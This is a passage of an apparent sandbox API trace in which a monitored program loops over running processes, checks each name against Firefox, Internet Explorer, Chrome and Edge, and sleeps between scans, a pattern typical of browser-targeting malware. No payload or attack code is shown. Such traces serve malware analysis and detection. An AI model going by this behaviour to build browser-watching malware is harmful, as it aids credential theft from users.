[0253.662] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0253.662] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0253.662] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.662] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.662] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.662] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.662] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.662] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.662] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0253.663] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0253.663] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0253.663] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0253.663] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.663] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.663] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0253.663] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0253.663] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0253.663] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.663] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0253.664] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0253.664] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0253.664] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0253.664] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.664] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.665] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0253.665] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0253.665] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0253.665] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.665] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.665] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0253.665] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0253.665] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0253.665] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.665] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.666] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0253.666] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0253.666] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0253.666] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.666] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.666] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0253.666] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0253.666] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0253.666] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.666] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0253.667] CloseHandle (hObject=0xd4) returned 1 [0253.667] Sleep (dwMilliseconds=0x3e8) [0254.679] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0254.680] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.681] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0254.681] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0254.681] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0254.681] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0254.681] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0254.681] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0254.681] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0254.681] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0254.681] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0254.681] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0254.682] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0254.682] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0254.682] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0254.682] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.682] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.682] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0254.682] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0254.683] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0254.683] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.683] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0254.683] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0254.683] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0254.683] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0254.683] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.683] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.684] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0254.684] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0254.684] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0254.684] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.684] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0254.684] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0254.684] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0254.684] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0254.684] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.684] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0254.685] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0254.685] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0254.685] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0254.685] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.685] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0254.685] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0254.685] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0254.685] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0254.685] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.685] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0254.686] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0254.686] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0254.686] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0254.686] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.686] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.686] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.687] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.687] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.687] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.687] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.687] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.687] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.687] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.687] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.687] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.688] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.688] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.688] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.688] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.688] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.688] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.688] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.688] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.688] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.688] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.689] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.689] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.689] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.689] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.689] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0254.689] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0254.689] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0254.689] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0254.689] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.689] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.690] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.690] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.690] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.690] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.690] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.691] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.691] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.691] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.691] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.691] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0254.691] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0254.691] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0254.691] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0254.691] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.691] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0254.692] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0254.692] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0254.692] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0254.692] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.692] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0254.692] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0254.692] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0254.692] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0254.692] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.692] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.693] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.693] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.693] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.693] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.693] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0254.693] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0254.693] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0254.693] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0254.693] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.693] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0254.694] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0254.694] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0254.694] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0254.694] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.694] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0254.695] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0254.695] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0254.695] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0254.695] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.695] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0254.695] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0254.695] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0254.695] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0254.695] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.695] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0254.696] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0254.696] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0254.696] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0254.696] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.696] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0254.696] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0254.696] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0254.696] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0254.696] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.696] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0254.697] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0254.697] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0254.697] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0254.697] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.697] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0254.697] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0254.697] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0254.697] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0254.698] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.698] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0254.698] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0254.698] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0254.698] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0254.698] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.698] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0254.699] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0254.699] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0254.699] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 